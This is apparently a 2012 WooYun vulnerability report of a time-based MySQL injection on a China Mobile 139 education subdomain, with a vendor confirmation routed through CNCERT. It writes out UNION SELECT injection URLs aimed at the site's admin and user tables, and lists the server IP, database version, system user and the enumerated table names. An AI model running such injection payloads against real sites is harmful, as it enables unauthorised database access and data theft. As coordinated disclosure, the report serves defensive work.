当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-013431

漏洞标题:移动互联分站漏洞集合一:sql注入

相关厂商:139移动互联

漏洞作者: 灰帽子

提交时间:2012-10-21 14:00

修复时间:2012-12-05 14:01

公开时间:2012-12-05 14:01

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2012-10-21: 细节已通知厂商并且等待厂商处理中
2012-10-21: 厂商已经确认,细节仅向厂商公开
2012-10-31: 细节向核心白帽子及相关领域专家公开
2012-11-10: 细节向普通白帽子公开
2012-11-20: 细节向实习白帽子公开
2012-12-05: 细节向公众公开

简要描述:

mysql time based注入

详细说明:

mysql time based注入

http://lunwen.jiaoyu.139.com/index.php?s=/Index/notice/id/1


部分手动测试数据

http://lunwen.jiaoyu.139.com/index.php?s=/Index/notice/id/1 order by 11
http://lunwen.jiaoyu.139.com/index.php?s=/Index/notice/id/1 union select 1,1,1,1,1,1,1,1,1,1,1
http://lunwen.jiaoyu.139.com/index.php?s=/Index/notice/id/1%20union%20select%201,2,3,4,5,6,7,8,9,10,11%20from%20ts_act_admin
http://lunwen.jiaoyu.139.com/index.php?s=/Index/notice/id/1%20union%20select%201,2,3,4,5,6,7,8,9,10,11%20from%20ts_lwds_user


扫描出来

Host IP:      111.13.52.209
 DB Server:    MySql time based
 Web Server:   nginx
 Sql Version:  5.1.60-log
 System User:  jxqlwds@192.168.131.5

漏洞证明:

数据库

lwds
test
information_schema


其中数据库lwds

+--------------------+
| ts_act_admin       |
| ts_act_notice      |
| ts_app             |
| ts_error_log       |
| ts_global_number   |
| ts_lwds_bakvote    |
| ts_lwds_product    |
| ts_lwds_regstat    |
| ts_lwds_user       |
| ts_lwds_vote       |
| ts_lwds_voteperson |
| ts_lwds_votestat   |
| ts_mobile_black    |
| ts_network         |
| ts_option          |
| ts_vote_reject     |


数据库information_schema

+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS                               |
| COLUMN_PRIVILEGES                     |
| ENGINES                               |
| EVENTS                                |
| FILES                                 |
| GLOBAL_STATUS                         |
| GLOBAL_VARIABLES                      |
| KEY_COLUMN_USAGE                      |
| PARTITIONS                            |
| PLUGINS                               |
| PROCESSLIST                           |
| PROFILING                             |
| REFERENTIAL_CONSTRAINTS               |
| ROUTINES                              |
| SCHEMATA                              |
| SCHEMA_PRIVILEGES                     |
| SESSION_STATUS                        |
| SESSION_VARIABLES                     |
| STATISTICS                            |
| TABLES                                |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| TRIGGERS                              |
| USER_PRIVILEGES                       |
| VIEWS                                 |
+---------------------------------------+

修复方案:

版权声明:转载请注明来源 灰帽子@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2012-10-21 23:10

厂商回复:

CNVD确认并复现所述情况,将在周一转由CNCERT统一协调中国移动集团公司批量处置近期的漏洞事件。
按完全影响机密性进行评分(未尝试提权情况),rank=7.79*1.0*1.3=10.127

最新状态:

暂无